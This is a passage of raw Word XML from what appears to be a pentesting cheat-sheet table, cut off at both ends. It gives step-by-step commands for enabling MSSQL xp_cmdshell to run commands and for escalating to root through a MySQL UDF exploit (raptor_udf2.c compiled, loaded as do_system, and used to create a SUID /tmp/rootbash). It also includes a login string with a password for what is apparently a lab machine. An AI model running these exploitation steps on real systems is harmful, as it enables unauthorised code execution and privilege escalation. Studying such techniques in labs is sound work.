          </w:tcPr>
          <w:p w14:paraId="7B8930A9" w14:textId="20F7A217" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="591CAD0B" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C275D55" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t>We can attempt to enable xp_cmdshell and gain remote code execution on the host. We can use the following commands to enable access to xp_cmdshell:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">EXEC sp_configure </w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>'Show Advanced Options'</w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>reconfigure</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sp_configure</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">EXEC sp_configure </w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>'xp_cmdshell'</w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>reconfigure</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">xp_cmdshell </w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>"whoami"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="22720983" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6B7A1C56" w14:textId="6B5EFFB8" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="469DF3F2" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34A4698D" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t xml:space="preserve">If we see from the </w:t>
            </w:r>
            <w:r w:rsidRPr="00411D2B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami </w:t>
            </w:r>
            <w:r>
              <w:t>command that we are a user account then that means we are running the SQL as a user which does mean we won’t quite have full privilieges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="6949B1B1" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0BE39E6A" w14:textId="2A7AF587" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36410859" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77EA0EE0" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t xml:space="preserve">Use the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FA6235">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA6235">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command if you need to read text, like how </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA6235">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t>command is used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="59CCDDD2" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B32B921" w14:textId="4ACFF9B2" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="73F4FB0E" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="185040A6" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Some times</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> you will need to use /\ to ‘escape’ the username, for example, if you had these credentials…</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User ID=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ARCHETYPE\sql_svc</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Password=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>M3g4c0rp123</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:t xml:space="preserve">IP Address= </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.27</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>The command using mssqlclient.py would be:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> mssqlclient.py </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="00B050"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>ARCHETYPE</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="00B050"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>\sql_svc</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>M3g4c0rp123</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3435">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A873CC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-windows-auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="0AF9EAA1" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2366A000" w14:textId="53EB1B40" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3314EA41" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>exploit code</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>via raptor_udf2.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="446B99AD" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t>If root access to the MySQL server can established, we can use this to gain privilege rights on the machine through this exploit.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Use the following commands to compile code that can be used to create a simple exploit for SQL servers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DC2A72">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">gcc </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC2A72">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-g -c </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC2A72">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">raptor_udf2.c </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC2A72">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-fPIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF3686C" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DC2A72">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">gcc </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC2A72">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-g -shared -Wl</w:t>
            </w:r>
            <w:r w:rsidRPr="009D5815">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>,-soname,</w:t>
            </w:r>
            <w:r w:rsidRPr="009D5815">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">raptor_udf2.so -o raptor_udf2.so raptor_udf2.o </w:t>
            </w:r>
            <w:r w:rsidRPr="009D5815">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-lc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="61858509" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30AACB7A" w14:textId="63A11739" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="234CC883" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53B4FE1D" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:t>Connect to the MySQL server using root account:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009D5815">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mysql </w:t>
            </w:r>
            <w:r w:rsidRPr="009D5815">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009D5815">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="75E10400" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A4D96B1" w14:textId="714057FE" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D9AD7C5" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="685487BE" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRPr="00440F19" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D5815">
              <w:t>Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>use mysql;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE86283" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRPr="00440F19" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>create table foo(line blob);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2717F0F1" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRPr="00440F19" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>insert into foo values(load_file('/home/user/tools/mysql-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>udf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/raptor_udf2.so'));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C830D9D" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRPr="00440F19" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AAE257D" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>create function do_system returns integer soname 'raptor_udf2.so';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E1AE7" w14:paraId="07B4EBE2" w14:textId="77777777" w:rsidTr="003E3BB6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="54635ACD" w14:textId="628F5E50" w:rsidR="002E1AE7" w:rsidRDefault="00E423AB" w:rsidP="003E3BB6">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="002E1AE7">
              <w:t>.k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="029F4C68" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3442F4C5" w14:textId="77777777" w:rsidR="002E1AE7" w:rsidRDefault="002E1AE7" w:rsidP="003E3BB6">
            <w:r w:rsidRPr="009D5815">
              <w:t>Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Then use </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3322">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>\q</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to back out of MySQL.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Run the command below to gain a shell with root privileges:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00440F19">
